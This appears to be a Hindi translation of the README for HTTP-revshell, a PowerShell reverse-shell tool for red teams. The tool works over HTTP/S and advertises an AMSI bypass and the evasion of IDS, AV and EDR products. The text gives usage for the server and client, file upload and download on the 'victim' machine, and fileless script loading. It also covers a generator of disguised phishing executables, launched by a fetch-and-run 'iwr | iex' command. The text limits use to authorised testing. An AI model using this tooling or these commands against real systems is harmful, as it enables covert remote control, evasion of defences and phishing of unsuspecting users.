
AMSI बाईपास और प्रॉक्सी अवेयर के साथ HTTP/S प्रोटोकॉल का उपयोग करके पॉवरशेल रिवर्स शेल
HTTP-revshell एक उपकरण है जो रेडटीम अभ्यासों और पेंटेस्टर्स पर केंद्रित है। यह उपकरण http/s प्रोटोकॉल के माध्यम से एक रिवर्स कनेक्शन प्रदान करता है। यह वेब अनुरोधों के माध्यम से पीड़ित मशीन पर नियंत्रण प्राप्त करने के लिए एक गुप्त चैनल का उपयोग करता है और इस प्रकार IDS, IPS और AV जैसे समाधानों से बचता है।
नोट: उपकरण को चोरी से बचने के संदर्भ में बनाए नहीं रखा जाएगा। बस कुछ बदलावों के साथ आप बाजार में कई EDRs को बायपास कर सकते हैं।

सर्वर उपयोग:
usage: server.py [-h] [--ssl] [--autocomplete] host port
positional arguments:
host सुनने का होस्ट
port सुनने का पोर्ट
optional arguments:
-h, --help यह सहायता संदेश दिखाएं और बाहर निकलें
--ssl ट्रैफ़िक को ssl पर भेजें
--autocomplete पावरशेल फ़ंक्शंस का ऑटोकम्प्लीट
क्लाइंट उपयोग:
Import-Module .\Invoke-WebRev.ps1
Invoke-WebRev -ip IP -port PORT [-ssl]
git clone https://github.com/3v4Si0N/HTTP-revshell.git
cd HTTP-revshell/
pip3 install -r requirements.txt
यह फ़ंक्शन आपको पीड़ित मशीन पर कोई भी फ़ाइल अपलोड करने की अनुमति देता है।
उपयोग:
upload /src/path/file C:\dest\path\file
यह फ़ंक्शन आपको हमलावर मशीन पर एक फ़ाइल डाउनलोड करने की अनुमति देता है।
उपयोग:
download C:\src\path\file /dst/path/file
यह फ़ंक्शन आपको पीड़ित की डिस्क पर लिखे बिना, वैध HTTP ट्रैफ़िक के माध्यम से फ़ाइल पढ़ते हुए, पावरशेल स्क्रिप्ट से लोड करने की अनुमति देता है।
उपयोग:
loadps1 /path/to/the/local/server/PowershellScript.ps1
यह स्क्रिप्ट आपको HTTP-revshell का उपयोग करने के लिए आवश्यक पेलोड के साथ एक निष्पादन योग्य फ़ाइल बनाने की अनुमति देती है, आपको बस इसे उत्पन्न करने के लिए स्क्रीन पर दिए गए निर्देशों का पालन करना होगा। 6 पूर्वनिर्धारित टेम्पलेट और एक अनुकूलन योग्य टेम्पलेट हैं, जिसमें आप अपनी पसंद का डेटा डाल सकते हैं।
उपकरण द्वारा उत्पन्न पेलोड, एप्लिकेशन के वैध आइकन के साथ-साथ मूल एप्लिकेशन के उत्पाद और कॉपीराइट जानकारी शामिल करते हैं। इसके अलावा, उनमें से प्रत्येक सर्वर के साथ कनेक्शन स्थापित करने से पहले मूल एप्लिकेशन को खोलता है, एक वैध एप्लिकेशन होने का दिखावा करता है। इसका उपयोग फ़िशिंग या रेड टीम अभ्यासों के लिए किया जा सकता है।
पेलोड जनरेटर उपयोग:
powershell "iwr -useb https://raw.githubusercontent.com/3v4Si0N/HTTP-revshell/master/Revshell-Generator.ps1 | iex"

महत्वपूर्ण: पूर्वनिर्धारित टेम्पलेट्स में सभी फ़ील्ड्स एंटर कुंजी दबाकर स्वतः पूर्ण हो जाते हैं।
यह स्क्रिप्ट LGPLv3+ के तहत लाइसेंस प्राप्त है। लाइसेंस का सीधा लिंक।
HTTP-revshell का उपयोग केवल अधिकृत पेनट्रेटियन परीक्षण और/या गैर-लाभकारी शैक्षिक उद्देश्यों के लिए किया जाना चाहिए। इस सॉफ़्टवेयर का कोई भी दुरुपयोग लेखक या किसी अन्य सहयोगी की जिम्मेदारी नहीं होगी। इसे अपने स्वयं के सर्वर पर और/या सर्वर मालिक की अनुमति से उपयोग करें।